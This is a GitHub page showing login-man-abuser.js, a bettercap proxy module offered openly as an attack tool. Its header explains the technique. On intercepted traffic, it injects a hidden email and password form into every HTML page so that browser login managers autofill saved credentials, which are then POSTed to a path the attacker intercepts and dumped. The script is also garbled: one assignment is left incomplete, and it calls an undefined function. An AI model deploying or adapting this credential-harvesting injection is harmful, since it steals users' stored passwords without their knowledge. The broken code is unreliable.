forked from bettercap/caplets
-
Notifications
You must be signed in to change notification settings - Fork 3
/
login-man-abuser.js
71 lines (64 loc) · 2.08 KB
/
login-man-abuser.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
/*
* Ref.
* - https://github.com/evilsocket/bettercap-proxy-modules/issues/72
* - https://freedom-to-tinker.com/2017/12/27/no-boundaries-for-user-identities-web-trackers-exploit-browser-login-managers/
*
* The idea:
*
* - On every html page, inject this invisible form who grabs credentials from login managers.
* - POST such credentials to /login-man-abuser, given we control the HTTP traffic, well intercept this request.
* - Intercept request, dump credentials, drop client to 404.
*/
var AbuserJavascript =
var injectForm = function(visible) {
var container = document.createElement("div");
if (!visible){
container.style.display = "none";
}
var form = document.createElement("form");
form.attributes.autocomplete = "on";
var emailInput = document.createElement("input");
emailInput.attributes.vcard_name = "vCard.Email";
emailInput.id = "email";
emailInput.type = "email";
emailInput.name = "email";
form.appendChild(emailInput);
var passwordInput = document.createElement("input");
passwordInput.id = "password";
passwordInput.type = "password";
passwordInput.name = "password";
form.appendChild(passwordInput);
container.appendChild(form);
document.body.appendChild(container);
};
var doPOST = function(data) {
var xhr = new XMLHttpRequest();
xhr.open("POST", "/login-man-abuser");
xhr.setRequestHeader("Content-Type", "application/json");
xhr.onload = function() {
console.log("Enjoy your coffee!");
};
xhr.send(JSON.stringify(data));
};
var sniffInputField = function(fieldId){
var inputElement = document.getElementById(fieldId);
if (inputElement.value.length){
return {fieldId: inputElement.value};
}
window.setTimeout(sniffInputField, 200, fieldId); // wait for 200ms
};
var sniffInputFields = function(){
var inputs = document.getElementsByTagName("input");
data = {};
for (var i = 0; i < inputs.length; i++) {
console.log("Will try to sniff element with id: " + inputs[i].id);
output = stringsniffInputField(inputs[i].id);
data = Object.assign({}, data, output);
}
doPOST(data);
};
var sniffFormInfo = function(visible) {
injectForm(visible);
sniffInputFields();
};
sniffFormInfo(false);;